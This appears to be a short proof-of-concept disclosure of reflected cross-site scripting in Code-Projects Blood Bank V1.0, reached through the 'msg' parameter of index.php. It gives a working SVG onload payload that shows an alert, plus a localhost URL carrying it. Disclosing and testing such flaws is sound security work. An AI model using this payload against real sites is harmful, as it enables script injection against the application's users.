
Proof-of-concept exploit for reflected cross-site scripting (XSS) in Code-Projects Blood Bank V1.0 via the 'msg' parameter in index.php, with payload demonstration.
<div><svg/onload=alert(document.domain)>http://localhost/bloodbank/index.php?msg=<div><svg/onload=alert(document.domain)>